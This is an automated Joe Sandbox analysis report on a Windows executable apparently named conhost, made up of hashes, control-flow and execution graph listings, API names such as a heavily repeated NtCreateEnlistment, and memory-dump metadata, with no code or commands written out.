                                                      • Instruction ID: 57029d4aa71c3b2a3076bdfac20101a8a7c31f9d9ce3a4c75ab1e07156f053e4
                                                      • Opcode Fuzzy Hash: 2650d536b62deb3d9d47a44c5ad09f6013c99e194f6b6cbe57e8081442e2c579
                                                      • Instruction Fuzzy Hash: 83516F36F08546DAEF148F21DD40BB83761AB16B94F448131DD1C9B7A4EEBCE481CB62

                                                      Control-flow Graph

                                                      Control-flow graph of 7ff62d5f1800–7ff62d5f1867 (block and edge rendering data omitted): two entry paths (7ff62d5f1812, 7ff62d5f1824) join at 7ff62d5f182b, which calls 7ff62d5f2290 and then fprintf.
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: fprintf
                                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                      • API String ID: 383729395-3474627141
                                                      • Opcode ID: b9775bf2c7c001ade3725bf189e2567a0e069ce32717a9dee567922b84cc9567
                                                      • Instruction ID: fd943284f394cfccc9e10e5cbc8bf60529cb95dc5b9a5b6807e189a711dfe134
                                                      • Opcode Fuzzy Hash: b9775bf2c7c001ade3725bf189e2567a0e069ce32717a9dee567922b84cc9567
                                                      • Instruction Fuzzy Hash: 1FF0F612E08E858AEA20AB24EE414BD6361EB5A7C0F509231DE4DFB251FF7CF182C711

                                                      Control-flow Graph

                                                      APIs
                                                      Similarity
                                                      • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                      • String ID:
                                                      • API String ID: 682475483-0
                                                      • Opcode ID: 2996161744fd7a7c03ea6c4091c9ef3f11398d7dc2e98130c39f15d04475f55c
                                                      • Instruction ID: 2ba1c7616785b970b780868d8194f25340a8155e675e732a91115ec4e6b73c74
                                                      • Opcode Fuzzy Hash: 2996161744fd7a7c03ea6c4091c9ef3f11398d7dc2e98130c39f15d04475f55c
                                                      • Instruction Fuzzy Hash: 4C011A65F0D90299FE168B01ED006345260BF45B90F448031DE0DEBBA4FF7CB9928363

                                                      Execution Graph

                                                      Execution Coverage:2.4%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:848
                                                      Total number of Limit Nodes:2
                                                      Execution graph listing for image 0000000140000000 (node and edge rendering data omitted; the listing is cut off after node 2036 at 140005fe0). Functions and the APIs their nodes are labelled with:
                                                      • 140001394: malloc (140005a50 / 140005b5f) and NtCreateEnlistment (1400013c6, a Kernel Transaction Manager call); called directly from 140001404 and then from a long run of consecutive sites up to 1400015f3, each summarised as "2 API calls"
                                                      • 140001000: __set_app_type (14000108b); 140001e00 → 140005fe0 (listing truncated here)
                                                      • 140001800: fprintf (140001835)
                                                      • 140001a70 / 140001ab3 / 140001ac3 / 140001ae4 / 14000199e: VirtualProtect (1400019e9); 140001ba0: memcpy (140001c04), VirtualQuery (140001c45), VirtualProtect (140001ca4), GetLastError (140001d23)
                                                      • 140001e10: signal (140001ed3, 140001eea, 140001f12); 140001e65 and 140001f47: signal (140001e67, 140001e82)
                                                      • 140001fd0: EnterCriticalSection, LeaveCriticalSection (140001ffd); 140002050: EnterCriticalSection (14000205e), LeaveCriticalSection (1400020c2)
                                                      • 140002104: EnterCriticalSection (140002111), TlsGetValue and GetLastError (14000214d), LeaveCriticalSection (14000220b), DeleteCriticalSection (140002241)
                                                      • 14000216f: InitializeCriticalSection (140002178)
                                                      • 14000219e: EnterCriticalSection (1400021ab), TlsGetValue and GetLastError (1400021e9), LeaveCriticalSection (140002265)
__setusermatherr 2035->2036 2137 140002320 strlen 2138 140002337 2137->2138 2147 140001140 2150 140001160 2147->2150 2149 140001156 2151 1400011b9 2150->2151 2152 14000118b 2150->2152 2153 1400011d3 2151->2153 2154 1400011c7 _amsg_exit 2151->2154 2152->2151 2155 1400011a0 Sleep 2152->2155 2156 140001201 _initterm 2153->2156 2157 14000121a 2153->2157 2154->2153 2155->2151 2155->2152 2156->2157 2173 140001880 2157->2173 2160 14000126a 2161 14000126f malloc 2160->2161 2162 14000128b 2161->2162 2164 1400012d0 2161->2164 2163 1400012a0 strlen malloc memcpy 2162->2163 2163->2163 2163->2164 2184 140003150 2164->2184 2166 140001315 2167 140001344 2166->2167 2168 140001324 2166->2168 2171 140001160 50 API calls 2167->2171 2169 140001338 2168->2169 2170 14000132d _cexit 2168->2170 2169->2149 2170->2169 2172 140001366 2171->2172 2172->2149 2174 1400018a2 2173->2174 2175 140001247 SetUnhandledExceptionFilter 2173->2175 2174->2175 2176 14000194d 2174->2176 2180 140001a20 2174->2180 2175->2160 2177 14000199e 2176->2177 2178 140001ba0 4 API calls 2176->2178 2177->2175 2179 1400019e9 VirtualProtect 2177->2179 2178->2176 2179->2177 2180->2177 2181 140001b53 2180->2181 2182 140001b36 2180->2182 2183 140001ba0 4 API calls 2182->2183 2183->2181 2187 140003166 2184->2187 2185 140003278 wcslen 2258 14000153f 2185->2258 2187->2185 2189 14000346e 2189->2166 2195 140003373 2196 14000341b wcslen 2195->2196 2197 140003431 2196->2197 2199 14000346c 2196->2199 2197->2199 2200 140003456 wcslen 2197->2200 2198 140003531 wcscpy wcscat 2202 140003563 2198->2202 2199->2198 2200->2197 2200->2199 2201 1400035b3 wcscpy wcscat 2204 1400035e9 2201->2204 2202->2201 2203 1400036fe wcscpy wcscat 2205 140003737 2203->2205 2204->2203 2206 140003a92 wcslen 2205->2206 2207 140003aa0 2206->2207 2208 140003adb 2206->2208 2207->2208 2210 140003ac6 wcslen 2207->2210 2209 140003bea wcscpy wcscat 2208->2209 2212 140003c1f 2209->2212 2210->2207 2210->2208 2211 140003c6f wcscpy wcscat 2214 140003ca8 2211->2214 
2212->2211 2213 140003ce5 wcscpy wcscat 2216 140003d2c 2213->2216 2214->2213 2215 140003d7e wcscpy wcscat wcslen 2398 14000146d 2215->2398 2216->2215 2221 140003e95 2484 1400014a9 2221->2484 2222 140003fd8 2224 14000145e 2 API calls 2222->2224 2231 140003f2c 2224->2231 2226 140003fc7 2228 14000145e 2 API calls 2226->2228 2227 1400056d7 2228->2231 2230 14000406a wcscpy wcscat wcslen 2238 140004140 2230->2238 2231->2227 2231->2230 2234 140003f20 2235 14000145e 2 API calls 2234->2235 2235->2231 2236 140004235 wcslen 2237 14000153f 2 API calls 2236->2237 2237->2238 2238->2236 2239 1400052fa memcpy 2238->2239 2240 14000442b wcslen 2238->2240 2241 14000469d wcslen 2238->2241 2244 140004f91 wcscpy wcscat wcslen 2238->2244 2247 140004523 wcslen 2238->2247 2250 14000145e NtCreateEnlistment malloc 2238->2250 2251 1400050d3 2238->2251 2252 14000545c memcpy 2238->2252 2253 1400026e0 9 API calls 2238->2253 2254 14000517e wcslen 2238->2254 2256 140004de5 wcscpy wcscat wcslen 2238->2256 2600 1400014d6 2238->2600 2673 140001521 2238->2673 2771 140001431 2238->2771 2239->2238 2645 14000157b 2240->2645 2242 14000153f 2 API calls 2241->2242 2242->2238 2245 140001422 2 API calls 2244->2245 2245->2238 2662 1400015a8 2247->2662 2250->2238 2251->2166 2252->2238 2253->2238 2255 1400015a8 2 API calls 2254->2255 2255->2238 2702 140001422 2256->2702 2259 140001394 2 API calls 2258->2259 2260 14000154e 2259->2260 2261 140001394 2 API calls 2260->2261 2262 14000155d 2261->2262 2263 140001394 2 API calls 2262->2263 2264 14000156c 2263->2264 2265 140001394 2 API calls 2264->2265 2266 14000157b 2265->2266 2267 140001394 2 API calls 2266->2267 2268 14000158a 2267->2268 2269 140001394 2 API calls 2268->2269 2270 140001599 2269->2270 2271 140001394 2 API calls 2270->2271 2272 1400015a8 2271->2272 2273 140001394 2 API calls 2272->2273 2274 1400015b7 2273->2274 2275 140001394 2 API calls 2274->2275 2276 1400015c6 2275->2276 2277 140001394 2 API calls 2276->2277 2278 1400015d5 2277->2278 2279 140001394 
2 API calls 2278->2279 2280 1400015e4 2279->2280 2281 140001394 2 API calls 2280->2281 2282 1400015f3 2281->2282 2282->2189 2283 140001503 2282->2283 2284 140001394 2 API calls 2283->2284 2285 14000150d 2284->2285 2286 140001394 2 API calls 2285->2286 2287 140001512 2286->2287 2288 140001394 2 API calls 2287->2288 2289 140001521 2288->2289 2290 140001394 2 API calls 2289->2290 2291 140001530 2290->2291 2292 140001394 2 API calls 2291->2292 2293 14000153f 2292->2293 2294 140001394 2 API calls 2293->2294 2295 14000154e 2294->2295 2296 140001394 2 API calls 2295->2296 2297 14000155d 2296->2297 2298 140001394 2 API calls 2297->2298 2299 14000156c 2298->2299 2300 140001394 2 API calls 2299->2300 2301 14000157b 2300->2301 2302 140001394 2 API calls 2301->2302 2303 14000158a 2302->2303 2304 140001394 2 API calls 2303->2304 2305 140001599 2304->2305 2306 140001394 2 API calls 2305->2306 2307 1400015a8 2306->2307 2308 140001394 2 API calls 2307->2308 2309 1400015b7 2308->2309 2310 140001394 2 API calls 2309->2310 2311 1400015c6 2310->2311 2312 140001394 2 API calls 2311->2312 2313 1400015d5 2312->2313 2314 140001394 2 API calls 2313->2314 2315 1400015e4 2314->2315 2316 140001394 2 API calls 2315->2316 2317 1400015f3 2316->2317 2317->2195 2318 14000156c 2317->2318 2319 140001394 2 API calls 2318->2319 2320 14000157b 2319->2320 2321 140001394 2 API calls 2320->2321 2322 14000158a 2321->2322 2323 140001394 2 API calls 2322->2323 2324 140001599 2323->2324 2325 140001394 2 API calls 2324->2325 2326 1400015a8 2325->2326 2327 140001394 2 API calls 2326->2327 2328 1400015b7 2327->2328 2329 140001394 2 API calls 2328->2329 2330 1400015c6 2329->2330 2331 140001394 2 API calls 2330->2331 2332 1400015d5 2331->2332 2333 140001394 2 API calls 2332->2333 2334 1400015e4 2333->2334 2335 140001394 2 API calls 2334->2335 2336 1400015f3 2335->2336 2336->2195 2337 14000145e 2336->2337 2338 140001394 2 API calls 2337->2338 2339 14000146d 2338->2339 2340 140001394 2 API calls 2339->2340 2341 
14000147c 2340->2341 2342 140001394 2 API calls 2341->2342 2343 14000148b 2342->2343 2344 140001394 2 API calls 2343->2344 2345 14000149a 2344->2345 2346 140001394 2 API calls 2345->2346 2347 1400014a9 2346->2347 2348 140001394 2 API calls 2347->2348 2349 1400014b8 2348->2349 2350 140001394 2 API calls 2349->2350 2351 1400014c7 2350->2351 2352 140001394 2 API calls 2351->2352 2353 1400014d6 2352->2353 2354 1400014e5 2353->2354 2355 140001394 2 API calls 2353->2355 2356 140001394 2 API calls 2354->2356 2355->2354 2357 1400014ef 2356->2357 2358 1400014f4 2357->2358 2359 140001394 2 API calls 2357->2359 2360 140001394 2 API calls 2358->2360 2359->2358 2361 1400014fe 2360->2361 2362 140001503 2361->2362 2363 140001394 2 API calls 2361->2363 2364 140001394 2 API calls 2362->2364 2363->2362 2365 14000150d 2364->2365 2366 140001394 2 API calls 2365->2366 2367 140001512 2366->2367 2368 140001394 2 API calls 2367->2368 2369 140001521 2368->2369 2370 140001394 2 API calls 2369->2370 2371 140001530 2370->2371 2372 140001394 2 API calls 2371->2372 2373 14000153f 2372->2373 2374 140001394 2 API calls 2373->2374 2375 14000154e 2374->2375 2376 140001394 2 API calls 2375->2376 2377 14000155d 2376->2377 2378 140001394 2 API calls 2377->2378 2379 14000156c 2378->2379 2380 140001394 2 API calls 2379->2380 2381 14000157b 2380->2381 2382 140001394 2 API calls 2381->2382 2383 14000158a 2382->2383 2384 140001394 2 API calls 2383->2384 2385 140001599 2384->2385 2386 140001394 2 API calls 2385->2386 2387 1400015a8 2386->2387 2388 140001394 2 API calls 2387->2388 2389 1400015b7 2388->2389 2390 140001394 2 API calls 2389->2390 2391 1400015c6 2390->2391 2392 140001394 2 API calls 2391->2392 2393 1400015d5 2392->2393 2394 140001394 2 API calls 2393->2394 2395 1400015e4 2394->2395 2396 140001394 2 API calls 2395->2396 2397 1400015f3 2396->2397 2397->2195 2399 140001394 2 API calls 2398->2399 2400 14000147c 2399->2400 2401 140001394 2 API calls 2400->2401 2402 14000148b 2401->2402 2403 140001394 
2 API calls 2402->2403 2404 14000149a 2403->2404 2405 140001394 2 API calls 2404->2405 2406 1400014a9 2405->2406 2407 140001394 2 API calls 2406->2407 2408 1400014b8 2407->2408 2409 140001394 2 API calls 2408->2409 2410 1400014c7 2409->2410 2411 140001394 2 API calls 2410->2411 2412 1400014d6 2411->2412 2413 1400014e5 2412->2413 2414 140001394 2 API calls 2412->2414 2415 140001394 2 API calls 2413->2415 2414->2413 2416 1400014ef 2415->2416 2417 1400014f4 2416->2417 2418 140001394 2 API calls 2416->2418 2419 140001394 2 API calls 2417->2419 2418->2417 2420 1400014fe 2419->2420 2421 140001503 2420->2421 2422 140001394 2 API calls 2420->2422 2423 140001394 2 API calls 2421->2423 2422->2421 2424 14000150d 2423->2424 2425 140001394 2 API calls 2424->2425 2426 140001512 2425->2426 2427 140001394 2 API calls 2426->2427 2428 140001521 2427->2428 2429 140001394 2 API calls 2428->2429 2430 140001530 2429->2430 2431 140001394 2 API calls 2430->2431 2432 14000153f 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000154e 2433->2434 2435 140001394 2 API calls 2434->2435 2436 14000155d 2435->2436 2437 140001394 2 API calls 2436->2437 2438 14000156c 2437->2438 2439 140001394 2 API calls 2438->2439 2440 14000157b 2439->2440 2441 140001394 2 API calls 2440->2441 2442 14000158a 2441->2442 2443 140001394 2 API calls 2442->2443 2444 140001599 2443->2444 2445 140001394 2 API calls 2444->2445 2446 1400015a8 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015b7 2447->2448 2449 140001394 2 API calls 2448->2449 2450 1400015c6 2449->2450 2451 140001394 2 API calls 2450->2451 2452 1400015d5 2451->2452 2453 140001394 2 API calls 2452->2453 2454 1400015e4 2453->2454 2455 140001394 2 API calls 2454->2455 2456 1400015f3 2455->2456 2456->2231 2457 140001530 2456->2457 2458 140001394 2 API calls 2457->2458 2459 14000153f 2458->2459 2460 140001394 2 API calls 2459->2460 2461 14000154e 2460->2461 2462 140001394 2 API calls 2461->2462 2463 14000155d 2462->2463 2464 140001394 2 API 
calls 2463->2464 2465 14000156c 2464->2465 2466 140001394 2 API calls 2465->2466 2467 14000157b 2466->2467 2468 140001394 2 API calls 2467->2468 2469 14000158a 2468->2469 2470 140001394 2 API calls 2469->2470 2471 140001599 2470->2471 2472 140001394 2 API calls 2471->2472 2473 1400015a8 2472->2473 2474 140001394 2 API calls 2473->2474 2475 1400015b7 2474->2475 2476 140001394 2 API calls 2475->2476 2477 1400015c6 2476->2477 2478 140001394 2 API calls 2477->2478 2479 1400015d5 2478->2479 2480 140001394 2 API calls 2479->2480 2481 1400015e4 2480->2481 2482 140001394 2 API calls 2481->2482 2483 1400015f3 2482->2483 2483->2221 2483->2222 2485 140001394 2 API calls 2484->2485 2486 1400014b8 2485->2486 2487 140001394 2 API calls 2486->2487 2488 1400014c7 2487->2488 2489 140001394 2 API calls 2488->2489 2490 1400014d6 2489->2490 2491 1400014e5 2490->2491 2492 140001394 2 API calls 2490->2492 2493 140001394 2 API calls 2491->2493 2492->2491 2494 1400014ef 2493->2494 2495 1400014f4 2494->2495 2496 140001394 2 API calls 2494->2496 2497 140001394 2 API calls 2495->2497 2496->2495 2498 1400014fe 2497->2498 2499 140001503 2498->2499 2500 140001394 2 API calls 2498->2500 2501 140001394 2 API calls 2499->2501 2500->2499 2502 14000150d 2501->2502 2503 140001394 2 API calls 2502->2503 2504 140001512 2503->2504 2505 140001394 2 API calls 2504->2505 2506 140001521 2505->2506 2507 140001394 2 API calls 2506->2507 2508 140001530 2507->2508 2509 140001394 2 API calls 2508->2509 2510 14000153f 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000154e 2511->2512 2513 140001394 2 API calls 2512->2513 2514 14000155d 2513->2514 2515 140001394 2 API calls 2514->2515 2516 14000156c 2515->2516 2517 140001394 2 API calls 2516->2517 2518 14000157b 2517->2518 2519 140001394 2 API calls 2518->2519 2520 14000158a 2519->2520 2521 140001394 2 API calls 2520->2521 2522 140001599 2521->2522 2523 140001394 2 API calls 2522->2523 2524 1400015a8 2523->2524 2525 140001394 2 API calls 2524->2525 2526 
1400015b7 2525->2526 2527 140001394 2 API calls 2526->2527 2528 1400015c6 2527->2528 2529 140001394 2 API calls 2528->2529 2530 1400015d5 2529->2530 2531 140001394 2 API calls 2530->2531 2532 1400015e4 2531->2532 2533 140001394 2 API calls 2532->2533 2534 1400015f3 2533->2534 2534->2226 2535 140001440 2534->2535 2536 140001394 2 API calls 2535->2536 2537 14000144f 2536->2537 2538 140001394 2 API calls 2537->2538 2539 14000145e 2538->2539 2540 140001394 2 API calls 2539->2540 2541 14000146d 2540->2541 2542 140001394 2 API calls 2541->2542 2543 14000147c 2542->2543 2544 140001394 2 API calls 2543->2544 2545 14000148b 2544->2545 2546 140001394 2 API calls 2545->2546 2547 14000149a 2546->2547 2548 140001394 2 API calls 2547->2548 2549 1400014a9 2548->2549 2550 140001394 2 API calls 2549->2550 2551 1400014b8 2550->2551 2552 140001394 2 API calls 2551->2552 2553 1400014c7 2552->2553 2554 140001394 2 API calls 2553->2554 2555 1400014d6 2554->2555 2556 1400014e5 2555->2556 2557 140001394 2 API calls 2555->2557 2558 140001394 2 API calls 2556->2558 2557->2556 2559 1400014ef 2558->2559 2560 1400014f4 2559->2560 2561 140001394 2 API calls 2559->2561 2562 140001394 2 API calls 2560->2562 2561->2560 2563 1400014fe 2562->2563 2564 140001503 2563->2564 2565 140001394 2 API calls 2563->2565 2566 140001394 2 API calls 2564->2566 2565->2564 2567 14000150d 2566->2567 2568 140001394 2 API calls 2567->2568 2569 140001512 2568->2569 2570 140001394 2 API calls 2569->2570 2571 140001521 2570->2571 2572 140001394 2 API calls 2571->2572 2573 140001530 2572->2573 2574 140001394 2 API calls 2573->2574 2575 14000153f 2574->2575 2576 140001394 2 API calls 2575->2576 2577 14000154e 2576->2577 2578 140001394 2 API calls 2577->2578 2579 14000155d 2578->2579 2580 140001394 2 API calls 2579->2580 2581 14000156c 2580->2581 2582 140001394 2 API calls 2581->2582 2583 14000157b 2582->2583 2584 140001394 2 API calls 2583->2584 2585 14000158a 2584->2585 2586 140001394 2 API calls 2585->2586 2587 140001599 
2586->2587 2588 140001394 2 API calls 2587->2588 2589 1400015a8 2588->2589 2590 140001394 2 API calls 2589->2590 2591 1400015b7 2590->2591 2592 140001394 2 API calls 2591->2592 2593 1400015c6 2592->2593 2594 140001394 2 API calls 2593->2594 2595 1400015d5 2594->2595 2596 140001394 2 API calls 2595->2596 2597 1400015e4 2596->2597 2598 140001394 2 API calls 2597->2598 2599 1400015f3 2598->2599 2599->2226 2599->2234 2601 1400014e5 2600->2601 2602 140001394 2 API calls 2600->2602 2603 140001394 2 API calls 2601->2603 2602->2601 2604 1400014ef 2603->2604 2605 1400014f4 2604->2605 2606 140001394 2 API calls 2604->2606 2607 140001394 2 API calls 2605->2607 2606->2605 2608 1400014fe 2607->2608 2609 140001503 2608->2609 2610 140001394 2 API calls 2608->2610 2611 140001394 2 API calls 2609->2611 2610->2609 2612 14000150d 2611->2612 2613 140001394 2 API calls 2612->2613 2614 140001512 2613->2614 2615 140001394 2 API calls 2614->2615 2616 140001521 2615->2616 2617 140001394 2 API calls 2616->2617 2618 140001530 2617->2618 2619 140001394 2 API calls 2618->2619 2620 14000153f 2619->2620 2621 140001394 2 API calls 2620->2621 2622 14000154e 2621->2622 2623 140001394 2 API calls 2622->2623 2624 14000155d 2623->2624 2625 140001394 2 API calls 2624->2625 2626 14000156c 2625->2626 2627 140001394 2 API calls 2626->2627 2628 14000157b 2627->2628 2629 140001394 2 API calls 2628->2629 2630 14000158a 2629->2630 2631 140001394 2 API calls 2630->2631 2632 140001599 2631->2632 2633 140001394 2 API calls 2632->2633 2634 1400015a8 2633->2634 2635 140001394 2 API calls 2634->2635 2636 1400015b7 2635->2636 2637 140001394 2 API calls 2636->2637 2638 1400015c6 2637->2638 2639 140001394 2 API calls 2638->2639 2640 1400015d5 2639->2640 2641 140001394 2 API calls 2640->2641 2642 1400015e4 2641->2642 2643 140001394 2 API calls 2642->2643 2644 1400015f3 2643->2644 2644->2238 2646 140001394 2 API calls 2645->2646 2647 14000158a 2646->2647 2648 140001394 2 API calls 2647->2648 2649 140001599 2648->2649 
2650 140001394 2 API calls 2649->2650 2651 1400015a8 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015b7 2652->2653 2654 140001394 2 API calls 2653->2654 2655 1400015c6 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400015d5 2656->2657 2658 140001394 2 API calls 2657->2658 2659 1400015e4 2658->2659 2660 140001394 2 API calls 2659->2660 2661 1400015f3 2660->2661 2661->2238 2663 140001394 2 API calls 2662->2663 2664 1400015b7 2663->2664 2665 140001394 2 API calls 2664->2665 2666 1400015c6 2665->2666 2667 140001394 2 API calls 2666->2667 2668 1400015d5 2667->2668 2669 140001394 2 API calls 2668->2669 2670 1400015e4 2669->2670 2671 140001394 2 API calls 2670->2671 2672 1400015f3 2671->2672 2672->2238 2674 140001394 2 API calls 2673->2674 2675 140001530 2674->2675 2676 140001394 2 API calls 2675->2676 2677 14000153f 2676->2677 2678 140001394 2 API calls 2677->2678 2679 14000154e 2678->2679 2680 140001394 2 API calls 2679->2680 2681 14000155d 2680->2681 2682 140001394 2 API calls 2681->2682 2683 14000156c 2682->2683 2684 140001394 2 API calls 2683->2684 2685 14000157b 2684->2685 2686 140001394 2 API calls 2685->2686 2687 14000158a 2686->2687 2688 140001394 2 API calls 2687->2688 2689 140001599 2688->2689 2690 140001394 2 API calls 2689->2690 2691 1400015a8 2690->2691 2692 140001394 2 API calls 2691->2692 2693 1400015b7 2692->2693 2694 140001394 2 API calls 2693->2694 2695 1400015c6 2694->2695 2696 140001394 2 API calls 2695->2696 2697 1400015d5 2696->2697 2698 140001394 2 API calls 2697->2698 2699 1400015e4 2698->2699 2700 140001394 2 API calls 2699->2700 2701 1400015f3 2700->2701 2701->2238 2703 140001394 2 API calls 2702->2703 2704 140001431 2703->2704 2705 140001394 2 API calls 2704->2705 2706 140001440 2705->2706 2707 140001394 2 API calls 2706->2707 2708 14000144f 2707->2708 2709 140001394 2 API calls 2708->2709 2710 14000145e 2709->2710 2711 140001394 2 API calls 2710->2711 2712 14000146d 2711->2712 2713 140001394 2 API calls 2712->2713 2714 
14000147c 2713->2714 2715 140001394 2 API calls 2714->2715 2716 14000148b 2715->2716 2717 140001394 2 API calls 2716->2717 2718 14000149a 2717->2718 2719 140001394 2 API calls 2718->2719 2720 1400014a9 2719->2720 2721 140001394 2 API calls 2720->2721 2722 1400014b8 2721->2722 2723 140001394 2 API calls 2722->2723 2724 1400014c7 2723->2724 2725 140001394 2 API calls 2724->2725 2726 1400014d6 2725->2726 2727 1400014e5 2726->2727 2728 140001394 2 API calls 2726->2728 2729 140001394 2 API calls 2727->2729 2728->2727 2730 1400014ef 2729->2730 2731 1400014f4 2730->2731 2732 140001394 2 API calls 2730->2732 2733 140001394 2 API calls 2731->2733 2732->2731 2734 1400014fe 2733->2734 2735 140001503 2734->2735 2736 140001394 2 API calls 2734->2736 2737 140001394 2 API calls 2735->2737 2736->2735 2738 14000150d 2737->2738 2739 140001394 2 API calls 2738->2739 2740 140001512 2739->2740 2741 140001394 2 API calls 2740->2741 2742 140001521 2741->2742 2743 140001394 2 API calls 2742->2743 2744 140001530 2743->2744 2745 140001394 2 API calls 2744->2745 2746 14000153f 2745->2746 2747 140001394 2 API calls 2746->2747 2748 14000154e 2747->2748 2749 140001394 2 API calls 2748->2749 2750 14000155d 2749->2750 2751 140001394 2 API calls 2750->2751 2752 14000156c 2751->2752 2753 140001394 2 API calls 2752->2753 2754 14000157b 2753->2754 2755 140001394 2 API calls 2754->2755 2756 14000158a 2755->2756 2757 140001394 2 API calls 2756->2757 2758 140001599 2757->2758 2759 140001394 2 API calls 2758->2759 2760 1400015a8 2759->2760 2761 140001394 2 API calls 2760->2761 2762 1400015b7 2761->2762 2763 140001394 2 API calls 2762->2763 2764 1400015c6 2763->2764 2765 140001394 2 API calls 2764->2765 2766 1400015d5 2765->2766 2767 140001394 2 API calls 2766->2767 2768 1400015e4 2767->2768 2769 140001394 2 API calls 2768->2769 2770 1400015f3 2769->2770 2770->2238 2772 140001394 2 API calls 2771->2772 2773 140001440 2772->2773 2774 140001394 2 API calls 2773->2774 2775 14000144f 2774->2775 2776 140001394 
2 API calls 2775->2776 2777 14000145e 2776->2777 2778 140001394 2 API calls 2777->2778 2779 14000146d 2778->2779 2780 140001394 2 API calls 2779->2780 2781 14000147c 2780->2781 2782 140001394 2 API calls 2781->2782 2783 14000148b 2782->2783 2784 140001394 2 API calls 2783->2784 2785 14000149a 2784->2785 2786 140001394 2 API calls 2785->2786 2787 1400014a9 2786->2787 2788 140001394 2 API calls 2787->2788 2789 1400014b8 2788->2789 2790 140001394 2 API calls 2789->2790 2791 1400014c7 2790->2791 2792 140001394 2 API calls 2791->2792 2793 1400014d6 2792->2793 2794 1400014e5 2793->2794 2795 140001394 2 API calls 2793->2795 2796 140001394 2 API calls 2794->2796 2795->2794 2797 1400014ef 2796->2797 2798 1400014f4 2797->2798 2799 140001394 2 API calls 2797->2799 2800 140001394 2 API calls 2798->2800 2799->2798 2801 1400014fe 2800->2801 2802 140001503 2801->2802 2803 140001394 2 API calls 2801->2803 2804 140001394 2 API calls 2802->2804 2803->2802 2805 14000150d 2804->2805 2806 140001394 2 API calls 2805->2806 2807 140001512 2806->2807 2808 140001394 2 API calls 2807->2808 2809 140001521 2808->2809 2810 140001394 2 API calls 2809->2810 2811 140001530 2810->2811 2812 140001394 2 API calls 2811->2812 2813 14000153f 2812->2813 2814 140001394 2 API calls 2813->2814 2815 14000154e 2814->2815 2816 140001394 2 API calls 2815->2816 2817 14000155d 2816->2817 2818 140001394 2 API calls 2817->2818 2819 14000156c 2818->2819 2820 140001394 2 API calls 2819->2820 2821 14000157b 2820->2821 2822 140001394 2 API calls 2821->2822 2823 14000158a 2822->2823 2824 140001394 2 API calls 2823->2824 2825 140001599 2824->2825 2826 140001394 2 API calls 2825->2826 2827 1400015a8 2826->2827 2828 140001394 2 API calls 2827->2828 2829 1400015b7 2828->2829 2830 140001394 2 API calls 2829->2830 2831 1400015c6 2830->2831 2832 140001394 2 API calls 2831->2832 2833 1400015d5 2832->2833 2834 140001394 2 API calls 2833->2834 2835 1400015e4 2834->2835 2836 140001394 2 API calls 2835->2836 2837 1400015f3 
2836->2837 2837->2238

Callgraph

Legend: Executed / Not Executed / Opacity -> Relevance / Disassembly available

callgraph: rendered graph data (function nodes Function_0000000140001000 through Function_00000001400022E0 and their call edges) omitted.

Control-flow Graph

APIs
• NtCreateEnlistment.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
Memory Dump Source
• Source File: 00000025.00000002.2668786866.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000025.00000002.2668752408.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.2668813498.0000000140007000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.2668838319.0000000140009000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.2668862414.000000014000A000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
Similarity
• API ID: CreateEnlistment
• String ID:
• API String ID: 1207551591-0
• Opcode ID: 2826bf933b6c05314846991301916adf57e49d07940debb5eab16ace37e77d14
• Instruction ID: 35ac0efe93fe85c119e55826d4317f241f31154ff2ae5808118bfd6961f8b30b
• Opcode Fuzzy Hash: 2826bf933b6c05314846991301916adf57e49d07940debb5eab16ace37e77d14
• Instruction Fuzzy Hash: B5F09DB2608B408AEA12DB52F89579A77A0F38D7C0F00991ABBC843735DB38C190CB40

                                                      Control-flow Graph

                                                      control_flow_graph 311 1400026e0-14000273b call 140002660 315 140002741-14000274b 311->315 316 14000280e-14000285e call 14000155d 311->316 318 140002774-14000277a 315->318 321 140002953-14000297b call 1400014c7 316->321 322 140002864-140002873 316->322 318->316 320 140002780-140002787 318->320 323 140002789-140002792 320->323 324 140002750-140002752 320->324 338 140002986-1400029c8 call 140001503 call 140005a40 321->338 339 14000297d 321->339 325 140002eb7-140002ef4 call 140001370 322->325 326 140002879-140002888 322->326 329 140002794-1400027ab 323->329 330 1400027f8-1400027fb 323->330 327 14000275a-14000276e 324->327 331 1400028e4-14000294e wcsncmp call 1400014e5 326->331 332 14000288a-1400028dd 326->332 327->316 327->318 335 1400027f5 329->335 336 1400027ad-1400027c2 329->336 330->327 331->321 332->331 335->330 340 1400027d0-1400027d7 336->340 349 140002e49-140002e84 call 140001370 338->349 350 1400029ce-1400029d5 338->350 339->338 342 1400027d9-1400027f3 340->342 343 140002800-140002809 340->343 342->335 342->340 343->327 353 1400029d7-140002a0c 349->353 357 140002e8a 349->357 352 140002a13-140002a43 wcscpy wcscat wcslen 350->352 350->353 355 140002a45-140002a76 wcslen 352->355 356 140002a78-140002aa5 352->356 353->352 358 140002aa8-140002abf wcslen 355->358 356->358 357->352 359 140002ac5-140002ad8 358->359 360 140002e8f-140002eab call 140001370 358->360 362 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 359->362 363 140002ada-140002aee 359->363 360->325 381 140002dfd-140002e1b call 140001512 362->381 382 140002e20-140002e48 call 14000145e 362->382 363->362 381->382
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2668786866.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000025.00000002.2668752408.0000000140000000.00000004.00000001.00020000.00000000.sdmp
